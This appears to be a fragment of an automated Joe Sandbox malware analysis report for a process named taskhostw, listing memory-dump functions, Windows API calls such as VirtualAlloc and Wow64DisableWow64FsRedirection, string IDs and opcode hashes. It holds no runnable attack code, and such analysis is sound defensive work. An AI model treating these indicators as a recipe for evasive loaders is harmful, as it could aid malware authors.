                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 774024439-3081909835
                                                                  • Opcode ID: 8a11e38c64d04a955871b7e9f367fc6abc6331618def36d67b5de071bbf1d687
                                                                  • Instruction ID: 5330d118b265c73dc4e36b44aba2279cf9d8d840752bd867f0f94e41705ae3f9
                                                                  • Opcode Fuzzy Hash: 8a11e38c64d04a955871b7e9f367fc6abc6331618def36d67b5de071bbf1d687
                                                                  • Instruction Fuzzy Hash: 61C17D715483109FD725EF24CA80A9BB7E9BF84314F40496DE8999B2A1DF30EC45CF82
                                                                  APIs
                                                                    • Part of subcall function 02A70336: std::exception::exception.LIBCMT ref: 02A7036C
                                                                    • Part of subcall function 02A70336: __CxxThrowException@8.LIBCMT ref: 02A70381
                                                                    • Part of subcall function 02A57341: _memmove.LIBCMT ref: 02A57382
                                                                    • Part of subcall function 02A56FB1: _memmove.LIBCMT ref: 02A5700B
                                                                  • __swprintf.LIBCMT ref: 02A6242D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: (+I
                                                                  • API String ID: 1943609520-2960116247
                                                                  • Opcode ID: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
                                                                  • Instruction ID: 2e2cf518d146b457ec19128515c6ac0683b2daa16bbd91497e70975c1adac4a4
                                                                  • Opcode Fuzzy Hash: a7d44465125579725e7362245ab52375a465db34ca9b10e291d2563ebfeac19e
                                                                  • Instruction Fuzzy Hash: 74914B715582119FCB14EF24C98897FB7A9EF89B00F40496EF8569B2A0DF30E948CB52
                                                                  APIs
                                                                    • Part of subcall function 001D0F36: std::exception::exception.LIBCMT ref: 001D0F6C
                                                                    • Part of subcall function 001D0F36: __CxxThrowException@8.LIBCMT ref: 001D0F81
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                    • Part of subcall function 001B7BB1: _memmove.LIBCMT ref: 001B7C0B
                                                                  • __swprintf.LIBCMT ref: 001C302D
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001C2EC6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 1943609520-557222456
                                                                  • Opcode ID: c3dafd78060bedf27c5af26cea18463b76bee0d4f8ad4fe5e87cd8586bbbdd84
                                                                  • Instruction ID: c9376fce6f4567a73a369ce6b33568a71d1cb65e0e0fa25ccb80fe79e639d147
                                                                  • Opcode Fuzzy Hash: c3dafd78060bedf27c5af26cea18463b76bee0d4f8ad4fe5e87cd8586bbbdd84
                                                                  • Instruction Fuzzy Hash: 66917D321082059FC718EF24C895DAFB7A5EFA5710F04491EF595972A2DB30EE44CB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$+
                                                                  • API String ID: 0-2552117581
                                                                  • Opcode ID: 119add5bba360e631dc5f87081a575dbbd15c46c6d6c2f5d9aecf6295a22cc9c
                                                                  • Instruction ID: e5352cbe04a85e2e08c70564b5a83dc0f689867177f7653fc32154fbd9ff8ff0
                                                                  • Opcode Fuzzy Hash: 119add5bba360e631dc5f87081a575dbbd15c46c6d6c2f5d9aecf6295a22cc9c
                                                                  • Instruction Fuzzy Hash: 925122345053269FCF269F28C485BFABBA4EF69314F144056FC919B2E2C734AD56CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$_memmove
                                                                  • String ID: ERCP
                                                                  • API String ID: 2532777613-1384759551
                                                                  • Opcode ID: 3bfe1a7d75c87271183ee3d1dcb48fddc25b5d7ead3575e97d6e5534e268cb5e
                                                                  • Instruction ID: fc5e6cb53d0be707c6866193be8c39ced5a397fbb470bd678ff4e3d6cb88cfd9
                                                                  • Opcode Fuzzy Hash: 3bfe1a7d75c87271183ee3d1dcb48fddc25b5d7ead3575e97d6e5534e268cb5e
                                                                  • Instruction Fuzzy Hash: A0516A71D00709DBDB24CF65C9997AAB7E8FF04314F20856EE94ADB640EB74AA40CB94
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$_memmove
                                                                  • String ID: ERCP
                                                                  • API String ID: 2532777613-1384759551
                                                                  • Opcode ID: 42e57a39a2154a6a93de8923550ef53e33c9e9b0cd99ba16cc016e1eb5a06b42
                                                                  • Instruction ID: 4883dbb647ea538e96fcda6a6ec46c724b82067bafdc0bfbc83a44d7598d06b2
                                                                  • Opcode Fuzzy Hash: 42e57a39a2154a6a93de8923550ef53e33c9e9b0cd99ba16cc016e1eb5a06b42
                                                                  • Instruction Fuzzy Hash: C3519471910305DBDB28CF65C941BAAB7F5FF14714F20856EE94ACB281E771EA94CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: &$@B'
                                                                  • API String ID: 3494438863-946825667
                                                                  • Opcode ID: b8f17ed9aa0b992396f61ed2aa764111cde3399229b97c659bdb3aa565271c33
                                                                  • Instruction ID: 2072d024d722d6ad684163c669cfce0f50bcba15ca516e13b4c45d141b0be9bc
                                                                  • Opcode Fuzzy Hash: b8f17ed9aa0b992396f61ed2aa764111cde3399229b97c659bdb3aa565271c33
                                                                  • Instruction Fuzzy Hash: DBF0C271708E228EF7288F99BC156A56796E751320B100427E588CE392E7B09CC04690
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: oL$doL
                                                                  • API String ID: 2102423945-3421622115
                                                                  • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                  • Instruction ID: f78658abb1b6714f82acfd47ba536c6927128d6dc8bc5df8c2e094cab434333e
                                                                  • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                  • Instruction Fuzzy Hash: 9EF082B6640304BAF3506761BC15FBB3A5DEB08354F01C439BE09D91A1DB759C008BAC
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4CA3
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,001B4C2E), ref: 001B4CB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 9f94e3a8fc79401242290f7fbc6f0abc0ed8066c9a8aadc8514cbb7d564320bb
                                                                  • Instruction ID: 05c96395149718c9cb3e5283bf4913beebb3b7bee730e6fa0b90bb0542d81fba
                                                                  • Opcode Fuzzy Hash: 9f94e3a8fc79401242290f7fbc6f0abc0ed8066c9a8aadc8514cbb7d564320bb
                                                                  • Instruction Fuzzy Hash: 95D012B0910727DFD7605F31FB18646B6E5AF06B55F11C839D8C5D6560D770D480C650
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4D6F
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4D81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: 60aabda7d26c9adc9f1e081f1814e18b123848efc6bcebe5a3c71dd06ee94a23
                                                                  • Instruction ID: c2b801dbb9f8348a0a76a163877eeff8b420c16af6bfbb4976ef5d4214204d70
                                                                  • Opcode Fuzzy Hash: 60aabda7d26c9adc9f1e081f1814e18b123848efc6bcebe5a3c71dd06ee94a23
                                                                  • Instruction Fuzzy Hash: 25D01270910713CFD7205F71F94C65676E9AF16351F11C93AD4CAD6260E770D480CA50
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 001B4DA2
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001B4DB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  • Opcode ID: dfaae8005068b33b210570c9d6fe8e6c5b9a2f1bcea51638196c847efd7adc0b
                                                                  • Instruction ID: 5821cc11500b4deede09ab1c09da25bd1d2a2f3d487f4e76e42c773a425f0e7a
                                                                  • Opcode Fuzzy Hash: dfaae8005068b33b210570c9d6fe8e6c5b9a2f1bcea51638196c847efd7adc0b
                                                                  • Instruction Fuzzy Hash: F9D01770960723CFDB209F71F90CA86B6E5AF16355F11C83AD8CAD6160E770D880CA60
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00230E80
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00230E92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: 86f388a6b367434cd78e4ec1164c27c37eec96cdb25e64e85920208dc0219760
                                                                  • Instruction ID: ba90700d3955bdba7cc42702de7de47f71b8c145fb137fa955c63660fb12d532
                                                                  • Opcode Fuzzy Hash: 86f388a6b367434cd78e4ec1164c27c37eec96cdb25e64e85920208dc0219760
                                                                  • Instruction Fuzzy Hash: F6D012B0D20713CFD7205F35E95854776E8AF05351F518C39A4CAD2150DA74C4D0C661
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0022E1D2
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0022E215
                                                                    • Part of subcall function 0022D8B9: CharLowerBuffW.USER32(?,?), ref: 0022D8D9
                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0022E415
                                                                  • _memmove.LIBCMT ref: 0022E428
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                  • String ID:
                                                                  • API String ID: 3659485706-0
                                                                  • Opcode ID: 8aad8f66d709c62035c5827c1ab9d085d4091ae2241657887057b7d37afac060
                                                                  • Instruction ID: 081a5eeb8a47437f03e426436f324cd3d723c7666aa5f3f2f96524884f578b70
                                                                  • Opcode Fuzzy Hash: 8aad8f66d709c62035c5827c1ab9d085d4091ae2241657887057b7d37afac060
                                                                  • Instruction Fuzzy Hash: D9C16A716183119FCB04DF68D480A6ABBE4FF89314F15896EF89A9B351D730E946CF82
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 002281D8
                                                                  • CoUninitialize.OLE32 ref: 002281E3
                                                                    • Part of subcall function 0020D87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0020D8E3
                                                                  • VariantInit.OLEAUT32(?), ref: 002281EE
                                                                  • VariantClear.OLEAUT32(?), ref: 002284BF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: 14d110f92fa4552a94178b7b001a326d25ad646197cb32764909a692c7f61c21
                                                                  • Instruction ID: a5a9a75d9bb366b9b315db03a366cb15c1137779f54b11b8255f6310e52e1abf
                                                                  • Opcode Fuzzy Hash: 14d110f92fa4552a94178b7b001a326d25ad646197cb32764909a692c7f61c21
                                                                  • Instruction Fuzzy Hash: 20A15A35614712AFCB10EF64D481B5AB7E4BF98324F04844DFA9A9B3A2CB30ED15CB42
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$__wsplitpath
                                                                  • String ID:
                                                                  • API String ID: 1413645957-0
                                                                  • Opcode ID: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
                                                                  • Instruction ID: e4ded6f0b5c769f80f9b64bf228a7cbae7445ce7faecdface1daea41984cd81e
                                                                  • Opcode Fuzzy Hash: 419868b450b4c3fed61ca736a3cba8fb66ed16f8ebe2498ea679e53552010edd
                                                                  • Instruction Fuzzy Hash: E3815F76504301DFCB25EF24C984EAAB7EAAF88364F18486FE885C7251EB34D944CF91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 7468645bec528243a6ba0bebfa5d10d145af6056dd3ff9e064b1a30d0a9f5097
                                                                  • Instruction ID: 8ed096679c9ca9fb03886919462b79a390b12e73aa03908bb264bc94590b8536
                                                                  • Opcode Fuzzy Hash: 7468645bec528243a6ba0bebfa5d10d145af6056dd3ff9e064b1a30d0a9f5097
                                                                  • Instruction Fuzzy Hash: 5151A6307343029FDB20AF65D899A69F7E5EF54310F20982FE596CB2D2DB7098B08B15
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$__wsplitpath_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 3240238573-0
                                                                  • Opcode ID: c4be0d6d051c9a5586649a060292ef201f444436ff07de910742ac9b52897b5e
                                                                  • Instruction ID: 56a2cb570d125a37c6296cf99f16ec08135575eaf1baff4080cf77cd80b010ab
                                                                  • Opcode Fuzzy Hash: c4be0d6d051c9a5586649a060292ef201f444436ff07de910742ac9b52897b5e
                                                                  • Instruction Fuzzy Hash: D06167B25047459FCB10EF20C980A9FB3E9FF89314F04496EE98987251DB35E948CF92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf_wprintf$_memmove
                                                                  • String ID:
                                                                  • API String ID: 2249476411-0
                                                                  • Opcode ID: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
                                                                  • Instruction ID: 95a86361bbd410330f9c8b0bbfe34f903527de94e51b2bdaa19f8b031496b50d
                                                                  • Opcode Fuzzy Hash: 5fe8276651298b12dd02ed1421de06954d2c5027e08e5021fe268e399811912e
                                                                  • Instruction Fuzzy Hash: 98517271840519AADF15EBA0DE81EEFB77EAF14300F1001A5E915721A1EF316F98DF64
                                                                  APIs
                                                                    • Part of subcall function 02A54445: _fseek.LIBCMT ref: 02A5445D
                                                                    • Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CCD
                                                                    • Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CE0
                                                                  • _free.LIBCMT ref: 02AB8B4B
                                                                  • _free.LIBCMT ref: 02AB8B52
                                                                  • _free.LIBCMT ref: 02AB8BBD
                                                                  • _free.LIBCMT ref: 02AB8BC5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$_fseek
                                                                  • String ID:
                                                                  • API String ID: 3404660211-0
                                                                  • Opcode ID: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
                                                                  • Instruction ID: f349d1be486ed32aff4535f42e3cdcae4bc835b4c5a176bc756e698b33890567
                                                                  • Opcode Fuzzy Hash: f56fa67e0b06d3e282f5813e55682b8b0f3bb457bdc1eb1ecdf5f6bc5c6e5ef9
                                                                  • Instruction Fuzzy Hash: 34514DB1944268AFDF259F64CC84ADEBBBEEF48300F00449EE609A7241DB755A90CF58
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf_wprintf$_memmove
                                                                  • String ID:
                                                                  • API String ID: 2249476411-0
                                                                  • Opcode ID: 1a87b35778fb241c9227f0f33b7aec30126c43843cecd2f26141487188273ef9
